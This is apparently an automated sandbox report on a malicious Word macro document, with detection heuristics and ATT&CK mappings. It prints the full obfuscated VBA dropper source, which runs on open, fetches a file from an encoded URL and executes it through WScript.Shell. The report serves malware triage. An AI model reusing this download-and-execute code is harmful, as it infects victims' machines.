Verdict: MALICIOUS
Risk Score: 330

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains VBA macros, including a Document_Open subroutine, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and CreateObject, suggesting the macro attempts to interact with the system, likely to download and execute a secondary payload. The ClamAV detection as 'Doc.Dropper.Donoff-5743530-0' further supports its role as a dropper.
Heuristics (10)

- ClamAV: Doc.Dropper.Donoff-5743530-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage. Matched lines in script:
      Dim WuEpb As String
      Set mWwoXQA = CreateObject("WScript.Shell")
      End Function
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:
      Dim fExpSbV As Boolean, RKLHuagrZb As Integer
      Set KfEVUAz = CreateObject("MSXML2.ServerXMLHTTP.6.0")
      Set ZOFvQisC = KfEVUAz
- CallByName call (high, OLE_VBA_CALLBYNAME): CallByName call. Matched lines in script:
      Public Sub PnhePatYp(ByVal TclEGHiNVZ As Integer, ByVal cDiPONhgdu As Variant, ByVal ZTmSy As Variant, ByVal BQmDx As Object, ByVal JOZQMs As Variant, ByVal ZRUZA As Integer, ByVal RKlXVuJje As String)
      CallByName BQmDx, RKlXVuJje, 1, ZTmSy, JOZQMs, cDiPONhgdu
      End Sub
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
      End Function
      Private Sub Document_Open()
      Dim LzHAxP As Integer
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8849 bytes |

SHA-256: 88686842451e0e5a60f724d8e2ef97067b2bb69f3fac64499ef7061fed15862e

Detection (macros.bas):
- ClamAV: No threats found
- Obfuscation or payload: likely. 173 of 252 identifiers look randomly generated (e.g. 'j4uHtnJoy8oycNRtefhPmcMgCDf4ju1'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function VpfjMw() As Integer
NddjA
If XBccwj(5601, "j4uHtnJoy8oycNRtefhPmcMgCDf4ju1") Then
kdFtL
Else
nuvzfFK
End If
VpfjMw = 8139
End Function
Private Sub Document_Open()
Dim LzHAxP As Integer
Dim UsohTS As Integer
EPrGkzHu.QYDdgP
End Sub
Private Sub KGvnuPk()
mJgHQ False, False, 4238
gcLIjQ True
End Sub
Attribute VB_Name = "aFCZE"
Private Sub wfvYYqQI()
QuYYqnyOFO
VmdNCfQ
XducHsOfcu "x1DnQDF2czp6Rx9jrX"
End Sub
Public Function ZOFvQisC() As Object
Dim fExpSbV As Boolean, RKLHuagrZb As Integer
Set KfEVUAz = CreateObject("MSXML2.ServerXMLHTTP.6.0")
Set ZOFvQisC = KfEVUAz
End Function
Public Function mWwoXQA() As Object
Dim WuEpb As String
Set mWwoXQA = CreateObject("WScript.Shell")
End Function
Public Function YdTUsFm() As Object
kSeUwKWLwH = 3434
Set YdTUsFm = CreateObject("ADODB.Stream")
End Function
Private Sub MCtMgah()
KbxYhbaay
AvUSfTJh "8EbN8KX3hIFQHcDIlQI", "o52tnaqhX64Zh0y4r", False
ZOkaSukV
End Sub
Attribute VB_Name = "BeYvRF"
Public Sub PnhePatYp(ByVal TclEGHiNVZ As Integer, ByVal cDiPONhgdu As Variant, ByVal ZTmSy As Variant, ByVal BQmDx As Object, ByVal JOZQMs As Variant, ByVal ZRUZA As Integer, ByVal RKlXVuJje As String)
CallByName BQmDx, RKlXVuJje, 1, ZTmSy, JOZQMs, cDiPONhgdu
End Sub
Public Sub DJVPI(ByVal pxDRulh As Object, ByVal jrBWdEm As Integer, ByVal NDAsEvilP As String, ByVal yCQGVhevt As String)
CallByName pxDRulh, NDAsEvilP, 1
End Sub
Public Function UbGPuJ(ByVal RREzJxxtD As String, ByVal VIrHfCIYF As String, ByVal ISVPXW As Object) As Variant
Set UbGPuJ = CallByName(ISVPXW, VIrHfCIYF, 2, RREzJxxtD)
End Function
Public Sub NKifxPpV(ByVal VSjVUF As Variant, ByVal DBwIkBro As String, ByVal ajVZXoIqG As Variant, ByVal bXMjSuTE As Object)
CallByName bXMjSuTE, DBwIkBro, 1, ajVZXoIqG, VSjVUF
End Sub
Private Function uYeVPhy(ByVal OCtJVgLy As String, ByVal bDPzlY As Integer) As String
jzfxURr 2340, 1181, 9816
piAMuSXS 6132, 4579
LXMizfaoij
If dADtLeg Then
uTkVafb 508, 9861
wqQuLT "zc5pscFjT2S8tZnwd", 3675
SlRmBd
End If
SCMoUyqWX
uYeVPhy = "e7HlC4v2sDVjbiov99wsrMoR"
End Function
Public Sub NqquGP(ByVal hVeELAyr As Variant, ByVal bMzMVuEupm As String, ByVal fbRAcm As Object, ByVal EzeHNehRF As Integer, ByVal pNFJaMR As String)
Dim xeEwuF As String
Dim yKNzUJers As String
CallByName fbRAcm, pNFJaMR, 1, hVeELAyr
End Sub
Public Function nTIJawB(ByVal ueBQcrWS As String, ByVal eMHLXuUVG As Object) As Variant
nTIJawB = CallByName(eMHLXuUVG, ueBQcrWS, 2)
End Function
Public Sub xVkQjut(ByVal FygbNsksM As Variant, ByVal pmVJAx As String, ByVal LDukdsJJjO As Object)
CallByName LDukdsJJjO, pmVJAx, 4, FygbNsksM
End Sub
Attribute VB_Name = "EGYbhgTTB"
Private Sub moKxvi()
OfSXF "9Obf1MXW8x08GTl7WT4IE", 6165
yHQxN
dgWaQn
If QREzQooq Then
gxyGcw
Else
qnYhDzuW
bBjpOnw "YU5a36sdqMf4gGhwRX", "t4xljyxgjyBYvwJ2FIasgwNg"
End If
End Sub
Public Function zkiLABPjC(ByVal rXqOy As String, ByVal ZPcQozUV As String) As String
Dim EbfjMcsfZd As Boolean
Dim oVkYhfM As Integer, xaMXvJj As Boolean
SBuYvDo = 5338
For ZlCVbbs = 1 To VbcouufHpG.gleSLxNG(3700, "KWCmiDd1IBm4bsky08t2", ZPcQozUV)
EbfjMcsfZd = VbcouufHpG.RkIzvdKt(rXqOy, "EbC2mO1OrtfR6CBcYOmVrvR6oajt", VbcouufHpG.ChuZLn(ZPcQozUV, ZlCVbbs, 2535, "UfMcc6HnOgr6Karnf2NGAmj"))
sEodtQL = "4smDlgVxUxh1eWCFA7Hkvl"
If Not EbfjMcsfZd Then
zkiLABPjC = VbcouufHpG.DYXpv(zkiLABPjC, VbcouufHpG.ChuZLn(ZPcQozUV, ZlCVbbs, 2535, "4o6PvsgUgKWGsP9GSQYDH20ja"))
End If
BhvAq = "STSBDuZZ4OAYHjaNd5S"
Next
End Function
Private Function rmdMD(ByVal lvLjb As Boolean) As String
mGpHG "2AkTeLJsmfzcvjHC7cRex", True, 9730
If iUWnPbt(1475, 8375) Then
MwUvLHxI
End If
QXMkh "htwEQMGrWzYauaLjxuD51O", 3269, False
aEcIpbKw True
wVbejPo
rmdMD = "UrN4qbO1m0X5zG5tm41srs98yse4b8r"
End Function
Attribute VB_Name = "EPrGkzHu"
Private Function KPCRpu() As String
KPCRpu = EGYbhgTTB.zkiLABPjC("3oLDj9", "P3R39OCLE3So9S")
End Function
Private Function FHqUGHp() As String
FHqUGHp = "6LLnWHRLeRqz2rACK3OC6975dmTgw"
End Function
Private Function KzMWjtPR() As String
KzMWjtPR = EGYbhgTTB.zkiLABPjC("F26o/L", "LUsL/e2ro-/ALgeFont/")
End Function
Private Function qdFqRQhX() As String
Dim akMCEUJWT As Integer, GJjGE As String
qdFqRQhX = EGYbhgTTB.zkiLABPjC("M lUa8", "U/a7e8b a0Ueac 9af6U4l80abUbMe. e88x e")
End Function
Private Function XRJdvmMod() As String
bLjwgJSUR = "2GcxUxHGeeqAk5dRzkW"
XRJdvmMod = EGYbhgTTB.zkiLABPjC("NgYqcZ", "ZEnYYviYYrgongmceNYnct")
End Function
Private Function bCFMzogl() As String
bCFMzogl = LMdEaw
End Function
Private Sub ksHBEmIcM(ByVal rHdYNX As String, ByVal gfvUXo As String, ByVal ISVgmGxq As Variant, ByVal sxHKvmRjs As String)
Dim idRkI As String
Dim NJQxMIoS As String
IaFbCbvQf = 5255
Set HDwZLwsW = aFCZE.YdTUsFm
BeYvRF.xVkQjut 1, EGYbhgTTB.zkiLABPjC("LBoZgmq/", "mTZypoeq"), HDwZLwsW
BeYvRF.DJVPI HDwZLwsW, 8172, EGYbhgTTB.zkiLABPjC("PiG1UjQ", "OipPeGni"), tqhjynsHjX
BeYvRF.NqquGP ISVgmGxq, tqhjynsHjX, HDwZLwsW, 7897, nStkt
BeYvRF.NKifxPpV 2, EGYbhgTTB.zkiLABPjC("fJGc9mC0", "JSaCvceG0TJoFmGiCleG"), rHdYNX, HDwZLwsW
BeYvRF.DJVPI HDwZLwsW, 8172, EGYbhgTTB.zkiLABPjC("KMwhE6", "6C6lo6Eswe"), tqhjynsHjX
End Sub
Private Function IhlIMYNeV() As String
IhlIMYNeV = EGYbhgTTB.zkiLABPjC("Okxw0KC", "kSOektwRweqOuOOeswtkHwexKa0dxerk")
End Function
Private Function WDMQt() As String
QhJzBSkuli = 9116
WDMQt = EGYbhgTTB.zkiLABPjC("PiG1UjQ", "OipPeGni")
End Function
Private Sub JBvHoKbqX()
Dim EHMWLhGy As Integer
On Error GoTo jZtTFePDmI
TNXSaJ bCFMzogl, whxVtLP
nHFskkviX = "CIqqAGvbDWl6WstTB"
AcwENd whxVtLP, "tTZOxcNDYIQY4DtncOF", False
Exit Sub
jZtTFePDmI:
End Sub
Private Sub TNXSaJ(ByVal ObzgdkHr As String, ByVal YsneAXqlUt As String)
Set VVpSmZGOkG = aFCZE.ZOFvQisC
BeYvRF.PnhePatYp 6693, False, EGYbhgTTB.zkiLABPjC("KAgQjJ2L", "GKLEAT"), VVpSmZGOkG, ObzgdkHr, 9594, WDMQt
LfPYoESsUK = False
BeYvRF.NKifxPpV EGYbhgTTB.zkiLABPjC("h5rHPCZg", "HMHozHHilhglCag/P4.ZZ0H 5(5cComgpharPtigCbPlPe;r)H"), IhlIMYNeV, KzMWjtPR, VVpSmZGOkG
eNLxFz = "P6nMhz83z3IpEfN9Fo2PSP9mXTRK3F"
BeYvRF.DJVPI VVpSmZGOkG, 8172, EGYbhgTTB.zkiLABPjC("pZhU24tr", "SZte4ndZ"), "q0p8Ub3rshCrQjDSx5eeGycByLyw"
ksHBEmIcM YsneAXqlUt, "1lJl0pKbN2dMZTH7Zt8dL7ROgX6fDEQD", BeYvRF.nTIJawB(EGYbhgTTB.zkiLABPjC("WwH50j7fY", "Rw7esf0poYnWfsej0BwodYyj"), VVpSmZGOkG), "5kiXE2vicHqpXXDAo1j5B6"
End Sub
Private Function tWEpW() As String
tWEpW = EGYbhgTTB.zkiLABPjC("HqVgy4nv", "Evxvency")
End Function
Private Function tqhjynsHjX() As String
usNmDIucf = "Jss7PasM9VAjJRtDHa3zJ8u"
tqhjynsHjX = "yupHqjNM6l8zqfIHH2kt9X8aSCR17G"
End Function
Private Function WBbee(ByVal ajrLip As String) As String
If HQBbc Then
JPlDg
zniWRh False, True, 1880
jQPOuwUO
Else
LYGsIFmC
HghafPQh 2785
rBimKfo 1091, 315, 2975
End If
WBbee = "ArdJdLW6VWH5LTazdUDbs"
End Function
Private Function vpQfEefLZ(ByVal LAcWYGPSDO As String) As String
Dim YdfgkbO As String
COovMr = "DAIdRdDYbbwjjTLoFNQMEn8"
Set JjPWUaL = BeYvRF.UbGPuJ(KPCRpu, XRJdvmMod, aFCZE.mWwoXQA)
vpQfEefLZ = JjPWUaL(LAcWYGPSDO)
End Function
Private Function LMdEaw() As String
LMdEaw = EGYbhgTTB.zkiLABPjC("BRfV5qi", "hBqtftpiq:/Rf/hBfpsqaqfz.iicqoqm/qis5ysift5emBR/qcqacVBh5e5/iwqorRVdB.e5fxeR")
End Function
Public Sub QYDdgP()
DSFWQ = 8775
JBvHoKbqX
End Sub
Private Function nStkt() As String
nStkt = EGYbhgTTB.zkiLABPjC("0dYXgI8ls", "lWrliYtgIe")
End Function
Private Sub AcwENd(ByVal CmtMtSSV As String, ByVal KbUrADqZEH As String, ByVal VejaggyhE As Boolean)
Dim wwLQLRaLTE As Integer
Dim hwtAkFuBQg As String
BeYvRF.NqquGP CmtMtSSV, FHqUGHp, aFCZE.mWwoXQA, 7897, tWEpW
End Sub
Private Function whxVtLP() As String
Dim TTxTguQk As Boolean, rfrVlXygqD As String
NzmDVOpD = False
whxVtLP = vpQfEefLZ(EGYbhgTTB.zkiLABPjC("IV6mZvAC", "CTECMmPI")) & qdFqRQhX
End Function
Attribute VB_Name = "VbcouufHpG"
Public Function RkIzvdKt(ByVal ApLkqQS As String, ByVal zajYYZ As String, ByVal AtzWDJa As String) As Boolean
Dim MDXrDg As Boolean
RkIzvdKt = InStr(1, ApLkqQS, AtzWDJa)
End Function
Public Function ChuZLn(ByVal QNcst As String, ByVal EPQuVyD As Integer, ByVal WWSdKLmkrP As Integer, ByVal EaGdHX As String) As String
Dim XgCALH As String
ChuZLn = Mid(QNcst, EPQuVyD, 1)
End Function
Public Function gleSLxNG(ByVal Mnxsav As Integer, ByVal hXFeORK As String, ByVal fLmgthl As String) As Integer
Dim iBnLD As Integer
gleSLxNG = Len(fLmgthl)
End Function
Public Function DYXpv(ByVal PcNXnoheu As String, ByVal jxdZSHlNT As String) As String
Dim qgGLn As String
DYXpv = PcNXnoheu & jxdZSHlNT
End Function